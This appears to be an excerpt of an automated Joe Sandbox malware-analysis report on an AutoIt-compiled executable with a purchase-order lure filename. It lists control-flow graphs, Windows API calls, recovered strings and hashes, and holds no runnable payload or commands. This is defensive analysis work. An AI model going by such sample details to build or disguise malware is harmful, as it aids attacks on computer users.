757->750 758->746 768 2dc5aa-2dc5af 758->768 769 2dc34e-2dc351 759->769 770 2dbf75-2dbf7d 760->770 771 2dc1f3-2dc1f9 760->771 761->728 761->760 762->740 774 2dc2d9-2dc2eb 762->774 772 2dc27e-2dc29a 763->772 773 2dc273-2dc27d 763->773 764->750 766 2dc44c-2dc44e 765->766 775 2dc48b-2dc4cc WideCharToMultiByte 766->775 776 2dc450-2dc466 766->776 778 2dc5c5-2dc5cc call 2d887d 768->778 779 2dc5b1-2dc5c3 call 2d889e call 2d886a 768->779 780 2dc391-2dc3da WriteFile 769->780 781 2dc353-2dc369 769->781 782 2dbf87-2dbf89 770->782 771->758 772->752 772->762 773->772 774->748 783 2dc2f1-2dc302 774->783 775->740 788 2dc4d2-2dc4d4 775->788 785 2dc468-2dc477 776->785 786 2dc47a-2dc489 776->786 778->747 779->747 780->740 793 2dc3e0-2dc3f8 780->793 790 2dc36b-2dc37d 781->790 791 2dc380-2dc38f 781->791 794 2dbf8f-2dbfb1 782->794 795 2dc11e-2dc121 782->795 783->745 784 2dc308 783->784 784->748 785->786 786->766 786->775 798 2dc4da-2dc50d WriteFile 788->798 790->791 791->769 791->780 793->748 801 2dc3fe-2dc40b 793->801 802 2dbfca-2dbfd6 call 2d22a8 794->802 803 2dbfb3-2dbfc8 794->803 796 2dc128-2dc155 795->796 797 2dc123-2dc126 795->797 804 2dc15b-2dc15e 796->804 797->796 797->804 805 2dc52d-2dc541 GetLastError 798->805 806 2dc50f-2dc529 798->806 801->759 808 2dc411 801->808 818 2dc01c-2dc01e 802->818 819 2dbfd8-2dbfec 802->819 809 2dc024-2dc036 call 2e4ea7 803->809 812 2dc165-2dc178 call 2e6634 804->812 813 2dc160-2dc163 804->813 817 2dc547-2dc549 805->817 806->798 814 2dc52b 806->814 808->748 828 2dc03c 809->828 829 2dc1e8-2dc1ee 809->829 812->740 832 2dc17e-2dc188 812->832 813->812 820 2dc1ba-2dc1bd 813->820 814->817 817->741 823 2dc54b-2dc563 817->823 818->809 825 2dc1c5-2dc1e0 819->825 826 2dbff2-2dc007 call 2e4ea7 819->826 820->782 824 2dc1c3 820->824 823->765 830 2dc569 823->830 824->829 825->829 826->829 838 2dc00d-2dc01a 826->838 833 2dc042-2dc077 WideCharToMultiByte 828->833 829->741 830->748 835 2dc1ae-2dc1b4 832->835 836 2dc18a-2dc1a1 call 2e6634 832->836 833->829 837 2dc07d-2dc0a3 WriteFile 833->837 835->820 836->740 843 2dc1a7-2dc1a8 836->843 837->740 840 2dc0a9-2dc0c1 837->840 838->833 840->829 842 2dc0c7-2dc0ce 840->842 842->835 844 2dc0d4-2dc0ff WriteFile 842->844 843->835 844->740 845 2dc105-2dc10c 844->845 845->829 846 2dc112-2dc119 845->846 846->835
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9983a6fedb05df54f642b46a876fbc4003a29133633ef3ec3c07deda4b5a5cc
                        • Instruction ID: f2634f9f22bd70fbdcd4ca67a6daa57ee1c5171b15f0d1d97383b7eadd2c6262
                        • Opcode Fuzzy Hash: e9983a6fedb05df54f642b46a876fbc4003a29133633ef3ec3c07deda4b5a5cc
                        • Instruction Fuzzy Hash: 58326E75B2222A8FDB258F14DC806E9B7B9FB46310F5440DAE40AE7B81D7709E90CF52
                        Function 002CE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1270 2ce47b-2ce50a call 2bd3d2 GetVersionExW call 2b7e53 call 2ce5f8 call 2ce617 1279 3229f9-3229fc 1270->1279 1280 2ce510-2ce511 1270->1280 1283 322a15-322a19 1279->1283 1284 3229fe 1279->1284 1281 2ce54d-2ce55d call 2ce6d1 1280->1281 1282 2ce513-2ce51e 1280->1282 1301 2ce55f-2ce57c GetCurrentProcess call 2ce70e 1281->1301 1302 2ce582-2ce59c 1281->1302 1285 2ce524-2ce526 1282->1285 1286 32297f-322985 1282->1286 1289 322a04-322a0d 1283->1289 1290 322a1b-322a24 1283->1290 1288 322a01 1284->1288 1291 2ce52c-2ce52f 1285->1291 1292 32299a-3229a6 1285->1292 1294 322987-32298a 1286->1294 1295 32298f-322995 1286->1295 1288->1289 1289->1283 1290->1288 1296 322a26-322a29 1290->1296 1299 3229c6-3229c9 1291->1299 1300 2ce535-2ce544 1291->1300 1297 3229b0-3229b6 1292->1297 1298 3229a8-3229ab 1292->1298 1294->1281 1295->1281 1296->1289 1297->1281 1298->1281 1299->1281 1303 3229cf-3229e4 1299->1303 1304 2ce54a 1300->1304 1305 3229bb-3229c1 1300->1305 1301->1302 1322 2ce57e 1301->1322 1307 2ce5ec-2ce5f6 GetSystemInfo 1302->1307 1308 2ce59e-2ce5b2 call 2ce694 1302->1308 1310 3229e6-3229e9 1303->1310 1311 3229ee-3229f4 1303->1311 1304->1281 1305->1281 1313 2ce5c9-2ce5d5 1307->1313 1317 2ce5e4-2ce5ea GetSystemInfo 1308->1317 1318 2ce5b4-2ce5bc call 2ce437 GetNativeSystemInfo 1308->1318 1310->1281 1311->1281 1315 2ce5dc-2ce5e1 1313->1315 1316 2ce5d7-2ce5da FreeLibrary 1313->1316 1316->1315 1321 2ce5be-2ce5c2 1317->1321 1318->1321 1321->1313 1324 2ce5c4-2ce5c7 FreeLibrary 1321->1324 1322->1302 1324->1313
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 002CE4A7
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • GetCurrentProcess.KERNEL32(00000000,0034DC28,?,?), ref: 002CE567
                        • GetNativeSystemInfo.KERNEL32(?,0034DC28,?,?), ref: 002CE5BC
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 002CE5C7
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 002CE5DA
                        • GetSystemInfo.KERNEL32(?,0034DC28,?,?), ref: 002CE5E4
                        • GetSystemInfo.KERNEL32(?,0034DC28,?,?), ref: 002CE5F0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                        • String ID:
                        • API String ID: 2717633055-0
                        • Opcode ID: dc033bc670f8ca599038a89d234a42538c289806c74743033095dec28814c0d1
                        • Instruction ID: ed8ec1df2323fd32db20463d4f4d2bcfdcf2667f82d545e85f67d659d886d86e
                        • Opcode Fuzzy Hash: dc033bc670f8ca599038a89d234a42538c289806c74743033095dec28814c0d1
                        • Instruction Fuzzy Hash: C461E2B18293D0DFCF16CF68A8C06EA7FA46F2A304F5A46DCD8449B207D624C958CF65
                        Function 002B31F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1342 2b31f2-2b320a CreateStreamOnHGlobal 1343 2b322a-2b322d 1342->1343 1344 2b320c-2b3223 FindResourceExW 1342->1344 1345 3257d3-3257e2 LoadResource 1344->1345 1346 2b3229 1344->1346 1345->1346 1347 3257e8-3257f6 SizeofResource 1345->1347 1346->1343 1347->1346 1348 3257fc-325807 LockResource 1347->1348 1348->1346 1349 32580d-325815 1348->1349 1350 325819-32582b 1349->1350 1350->1346
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002B3202
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 002B3219
                        • LoadResource.KERNEL32(?,00000000), ref: 003257D7
                        • SizeofResource.KERNEL32(?,00000000), ref: 003257EC
                        • LockResource.KERNEL32(?), ref: 003257FF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: 8f535a291980fc09fb41d94de8536aed84906e134bcb28832248ae8278485c61
                        • Instruction ID: 8be59419b186d0c3b1fa8d409db38139c074b8b49438dffa9fd8a4c3bbe7a0ba
                        • Opcode Fuzzy Hash: 8f535a291980fc09fb41d94de8536aed84906e134bcb28832248ae8278485c61
                        • Instruction Fuzzy Hash: B8115A74210705AFE7228B65EC89F677BBDEBC9B41F108428B842D6150DB71DD108A60
                        Function 002CDD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNEL32(002BC848,002BC848), ref: 002CDDA2
                        • FindFirstFileW.KERNEL32(002BC848,?), ref: 00324A83
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$AttributesFindFirst
                        • String ID:
                        • API String ID: 4185537391-0
                        • Opcode ID: 781456b75138e1c8a531807324e8b1c432541fc4b91960da5f7b0c488f0c4247
                        • Instruction ID: 2fec3a12e1fcbd98dcf863432fcc146ea5af266b739d2329de3db57ef1e4cccd
                        • Opcode Fuzzy Hash: 781456b75138e1c8a531807324e8b1c432541fc4b91960da5f7b0c488f0c4247
                        • Instruction Fuzzy Hash: 56E04832C245156742156778FC4D8E9775C9A45339F100719F876C11F0E7B09D5495D6
                        Function 002BE1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                        Download Yara Rule
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002BE279
                        • timeGetTime.WINMM ref: 002BE51A
                        • TranslateMessage.USER32(?), ref: 002BE646
                        • DispatchMessageW.USER32(?), ref: 002BE651
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002BE664
                        • LockWindowUpdate.USER32(00000000), ref: 002BE697
                        • DestroyWindow.USER32 ref: 002BE6A3
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002BE6BD
                        • Sleep.KERNEL32(0000000A), ref: 00325B15
                        • TranslateMessage.USER32(?), ref: 003262AF
                        • DispatchMessageW.USER32(?), ref: 003262BD
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003262D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                        • API String ID: 2641332412-570651680
                        • Opcode ID: 437f04154c5abbcf96b367a8e55e4cac383013b04760b5a99995f1ea9564f939
                        • Instruction ID: 1517caa7666c2a24e455eaa6a17d0c67978a85e2490062344ff8a20853d501c7
                        • Opcode Fuzzy Hash: 437f04154c5abbcf96b367a8e55e4cac383013b04760b5a99995f1ea9564f939
                        • Instruction Fuzzy Hash: C6620070518340DFDB26DF24D885BEA77E8BF44344F05496DF94A8B292DBB0E898CB52
                        Function 002E6A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • ___createFile.LIBCMT ref: 002E6C73
                        • ___createFile.LIBCMT ref: 002E6CB4
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002E6CDD
                        • __dosmaperr.LIBCMT ref: 002E6CE4
                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002E6CF7
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002E6D1A
                        • __dosmaperr.LIBCMT ref: 002E6D23
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002E6D2C
                        • __set_osfhnd.LIBCMT ref: 002E6D5C
                        • __lseeki64_nolock.LIBCMT ref: 002E6DC6
                        • __close_nolock.LIBCMT ref: 002E6DEC
                        • __chsize_nolock.LIBCMT ref: 002E6E1C
                        • __lseeki64_nolock.LIBCMT ref: 002E6E2E
                        • __lseeki64_nolock.LIBCMT ref: 002E6F26
                        • __lseeki64_nolock.LIBCMT ref: 002E6F3B
                        • __close_nolock.LIBCMT ref: 002E6F9B
                          • Part of subcall function 002DF84C: CloseHandle.KERNEL32(00000000,0035EEC4,00000000,?,002E6DF1,0035EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002DF89C
                          • Part of subcall function 002DF84C: GetLastError.KERNEL32(?,002E6DF1,0035EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002DF8A6
                          • Part of subcall function 002DF84C: __free_osfhnd.LIBCMT ref: 002DF8B3
                          • Part of subcall function 002DF84C: __dosmaperr.LIBCMT ref: 002DF8D5
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __lseeki64_nolock.LIBCMT ref: 002E6FBD
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002E70F2
                        • ___createFile.LIBCMT ref: 002E7111
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002E711E
                        • __dosmaperr.LIBCMT ref: 002E7125
                        • __free_osfhnd.LIBCMT ref: 002E7145
                        • __invoke_watson.LIBCMT ref: 002E7173
                        • __wsopen_helper.LIBCMT ref: 002E718D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                        • String ID: 9A-$@
                        • API String ID: 3896587723-4263143223
                        • Opcode ID: 49ca7a5c03424173edafedfef587d4ad705a26ca0c74adbef2d2db8344fddb73
                        • Instruction ID: bb8132aa1b1bfd4393f57a2fa8981225ea2fc6404ad01dcce6c4338fc4dd3fc4
                        • Opcode Fuzzy Hash: 49ca7a5c03424173edafedfef587d4ad705a26ca0c74adbef2d2db8344fddb73
                        • Instruction Fuzzy Hash: 14228A31D602879BEF258F6ADC59BAD7B60EF20364FA84229E511EB2D1C7358D70CB50
                        Function 003001E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • _wcscpy.LIBCMT ref: 0030026A
                        • _wcschr.LIBCMT ref: 00300278
                        • _wcscpy.LIBCMT ref: 0030028F
                        • _wcscat.LIBCMT ref: 0030029E
                        • _wcscat.LIBCMT ref: 003002BC
                        • _wcscpy.LIBCMT ref: 003002DD
                        • __wsplitpath.LIBCMT ref: 003003BA
                        • _wcscpy.LIBCMT ref: 003003DF
                        • _wcscpy.LIBCMT ref: 003003F1
                        • _wcscpy.LIBCMT ref: 00300406
                        • _wcscat.LIBCMT ref: 0030041B
                        • _wcscat.LIBCMT ref: 0030042D
                        • _wcscat.LIBCMT ref: 00300442
                          • Part of subcall function 002FC890: _wcscmp.LIBCMT ref: 002FC92A
                          • Part of subcall function 002FC890: __wsplitpath.LIBCMT ref: 002FC96F
                          • Part of subcall function 002FC890: _wcscpy.LIBCMT ref: 002FC982
                          • Part of subcall function 002FC890: _wcscat.LIBCMT ref: 002FC995
                          • Part of subcall function 002FC890: __wsplitpath.LIBCMT ref: 002FC9BA
                          • Part of subcall function 002FC890: _wcscat.LIBCMT ref: 002FC9D0
                          • Part of subcall function 002FC890: _wcscat.LIBCMT ref: 002FC9E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                        • String ID: >>>AUTOIT SCRIPT<<<
                        • API String ID: 2955681530-2806939583
                        • Opcode ID: f3eac83307eeae14ba9f159d5ecce75033a14311ff4bc15335f6983f65cb6a57
                        • Instruction ID: 8d4f4567be3620d5f73dd67496cd8f23cf2d6c206b0ab31e45108096a3dc8f99
                        • Opcode Fuzzy Hash: f3eac83307eeae14ba9f159d5ecce75033a14311ff4bc15335f6983f65cb6a57
                        • Instruction Fuzzy Hash: 3791AE71514705AFCB25EB50C865FEAB3E8AF84310F04485EF5599B292EB30EA68CF52
                        Function 002B2F58 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 002B2F8B
                        • RegisterClassExW.USER32(00000030), ref: 002B2FB5
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B2FC6
                        • InitCommonControlsEx.COMCTL32(?), ref: 002B2FE3
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B2FF3
                        • LoadIconW.USER32(000000A9), ref: 002B3009
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3018
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3To
                        • API String ID: 2914291525-26617492
                        • Opcode ID: 5ed1c6c9fd1f530056f63e1ac59073648dce2dc194b6dfb8ea2ac85bce9d4fc9
                        • Instruction ID: 593c0cb3b844569bfb2f95024224b6038eac601ad392fa1bb23cd7bc2d653e77
                        • Opcode Fuzzy Hash: 5ed1c6c9fd1f530056f63e1ac59073648dce2dc194b6dfb8ea2ac85bce9d4fc9
                        • Instruction Fuzzy Hash: 9921B8B5910318AFDB12DFA9EC89BCEBBF8FB08704F10411AF515A62A0D7B54584CF91
                        Function 002B4257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00000000,00000001,00000000), ref: 002B428C
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 002D1BC7: __wcsicmp_l.LIBCMT ref: 002D1C50
                        • _wcscpy.LIBCMT ref: 002B43C0
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0032214E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe$CMDLINE$CMDLINERAW
                        • API String ID: 861526374-2720470740
                        • Opcode ID: ba2bf24e58893386554c65626c56b41af4c0534c7ea2f5138334b2b016ebd201
                        • Instruction ID: 53dadb6fedcd11d463823a33763020e1fab485bf1a3a4fcb5feb8b8cbfdea531
                        • Opcode Fuzzy Hash: ba2bf24e58893386554c65626c56b41af4c0534c7ea2f5138334b2b016ebd201
                        • Instruction Fuzzy Hash: 4B819472920119AACB15EBE4DC92EEFB7BCEF05390F600016F545B7092EF606A64CF61
                        Function 002CE975 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 170COMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002CEA39
                        • __wsplitpath.LIBCMT ref: 002CEA56
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcsncat.LIBCMT ref: 002CEA69
                        • __makepath.LIBCMT ref: 002CEA85
                          • Part of subcall function 002D2BFF: __wmakepath_s.LIBCMT ref: 002D2C13
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                        • _wcscpy.LIBCMT ref: 002CEABE
                          • Part of subcall function 002CEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,002CEADA,?,?), ref: 002CEB27
                        • _wcscat.LIBCMT ref: 003232FC
                        • _wcscat.LIBCMT ref: 00323334
                        • _wcsncpy.LIBCMT ref: 00323370
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                        • String ID: Include$\$"7
                        • API String ID: 1213536620-3415774452
                        • Opcode ID: f30f0464bfb78b9b7d10cfeec642bcf38f00bf3fb403aea8012e47eb342d0557
                        • Instruction ID: ab0130219678f34e1c271388c37c48acd2220fb64d0a1c6aaa24cce378459bd3
                        • Opcode Fuzzy Hash: f30f0464bfb78b9b7d10cfeec642bcf38f00bf3fb403aea8012e47eb342d0557
                        • Instruction Fuzzy Hash: 89516CB94143409BE326EF54EC85C9BB7ECFB48300F40491EF54987261EB749A98CF66
                        Function 002FC890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
